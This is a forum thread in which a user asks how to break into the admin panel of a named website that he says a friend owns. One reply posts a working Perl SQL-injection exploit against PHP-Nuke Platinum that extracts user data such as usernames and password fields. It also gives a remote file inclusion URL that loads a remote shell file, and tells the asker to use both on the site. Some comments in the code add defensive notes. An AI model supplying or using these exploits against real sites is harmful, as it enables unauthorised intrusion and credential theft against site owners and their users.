
Omen 18May2008 05:44

Admin id and pw...
 
There is a site that I would like to get into..
It is owned by a very good friend of mine and I want to see if I can get into it..

here is the link: http://www.udiclan.net/admin.php

Will someone tell me how I should get in that? :)

shabbir 18May2008 11:05

Re: Admin id and pw...
 
Ask your friend

Omen 18May2008 19:38

Re: Admin id and pw...
 
Do you honestly think he would tell me?

To be completely honest I really just would like to know. How and what would I use to get into that site? He is my friend though

faizulhaque 24May2008 18:17

Re: Admin id and pw...
 
Nice idea given by Mr. Shabbir

XXxxImmortalxxXX 12Jun2008 11:40

Re: Admin id and pw...
 
here u go

dynamic_titles.php exploit
Code:

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id        name        username        user_email        femail        user_website        user_avatar        user_regdate        user_icq        user_occ        user_from        user_interests        user_sig        user_viewemail        user_theme        user_aim        user_yim        user_msnm        user_password        storynum        umode        uorder        thold        noscore        bio        ublockon        ublock        theme        commentmax        counter        newsletter        user_posts        user_attachsig        user_rank        user_level        broadcast        popmeson        user_active        user_session_time        user_session_page        user_lastvisit        user_timezone        user_style        user_lang        user_dateformatuser_new_privmsg        user_unread_privmsg        user_last_privmsg        user_emailtime        user_allowhtml        user_allowbbcode        user_allowsmile        user_allowavatar        user_allow_pm        user_allow_viewonline        user_notify        user_notify_pm        user_popup_pm        user_avatar_type        user_sig_bbcode_uid user_actkey        user_newpasswd        last_ip        user_color_gc        user_color_gi        user_quickreply        user_allow_arcadepm        kick_ban        user_wordwrap        agreedtos        user_view_log        user_effects        user_privs        user_custitle        user_specmsg        user_items        user_trade        points        user_cash        last_seen_blocker        user_login_tries        user_last_login_try        user_gender        user_birthday        user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
# Top-level driver of the proof-of-concept for the SQL injection described in
# the header comments (includes/dynamic_titles.php, magic_quotes_gpc = OFF).
# It parses flags, builds one URL and hands it to getit().
#
# The usage line is printed unconditionally on every run, not only on error.
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
# Defaults used when -c / -t / -id are not given. $host and $path have no
# default, so without -h and -p they are empty in the URL built below.
$column = "username";
$table  = "nuke_users";
$uid    = 2;
# Maps each command-line flag to the NAME of the package variable it sets.
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

# $a is incremented before use, so inside the loop $ARGV[$a] is the argument
# that follows the one currently in $_.
$a = 0;
foreach  (@ARGV) {
        $a++;
        while (($k, $v) = each(%cm_n_)) {
                if ($_ eq $k) {
                        # Symbolic reference: assigns to the package variable whose
                        # name is in $v (e.g. $host). This only works because the
                        # script does not enable `use strict`.
                        ${$v} = $ARGV[$a];
                }
        }
}
# The command-line values are concatenated, without any escaping, into the `p`
# query parameter of modules.php?name=Forums; the second argument is the
# pattern getit() applies to the response body.
# NOTE(review), defensive reading: this request is recognisable in web-server
# logs as modules.php?name=Forums with a `p` value containing a single quote
# and `union+select`. The header comments locate the flaw in
# includes/dynamic_titles.php and say it requires magic_quotes_gpc = OFF; the
# server-side fix belongs where that file places `p` into its SQL (bind it as
# a query parameter or validate it first; the expected type of `p` is not
# visible here, so confirm against the application).
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
# getit($url, $reg)
# Issues one HTTP GET for $url, matches the response body against the pattern
# in $reg and, on a match, prints "<column>:<field>" where <field> is the
# second ">>"-separated piece of the first capture group.
#
# The ($$) prototype has no effect on the call made in this script: that call
# uses the &-form, which bypasses prototypes.
# Every variable below is a package global (no `my`); $column is the one set
# by the top-level code, not a parameter of this sub.
sub getit($$)
{
        $url = shift;
        $reg = shift;


        $ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    # The body is used without checking whether the request succeeded, so an
    # error page is matched against the pattern like any other response.
    $content = $response->content;

        # $reg is interpolated as a regex. With the pattern the top-level code
        # passes, $1 is the text of the response's <title> element, i.e. the
        # place where the page reflects the query result.
        if ($content=~m/$reg/) {
            # Only the second field ($s) is used; $f and $l are never read.
            ($f,$s,$l) = split(">>",$1);
            # Removes the first occurrence of the literal " Post " from the field.
            $s =~s/ Post //;
            print $column.":".$s."\n";
        }
}



and

remote file inclusion vulnerability

Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
Lines:

----------------------------------------------
// Excerpt of the vulnerable lines quoted by the advisory above.
// The variable assigned here is $phpbb_root_path, but the two includes below
// read $nuke_bb_root_path, which is not assigned anywhere in the lines shown.
// The advisory lists "Register_globals: On"; under that setting a request
// parameter with that name populates the variable, so the include path is
// controlled by the caller rather than by this file.
// Defensive fix: build the include path from the locally assigned value (or a
// constant), and keep register_globals and allow_url_include disabled.
$phpbb_root_path = 'modules/Forums/';
include($nuke_bb_root_path . 'extension.inc');
// $phpEx is also not assigned in the lines shown; presumably it is set
// elsewhere in the application (confirm against the full file).
include($nuke_bb_root_path . 'common.'.$phpEx);



If he has not updated his site, Platinum, which is the forum he is using, is vulnerable.

if u dont know how to do then look up how to do it:)

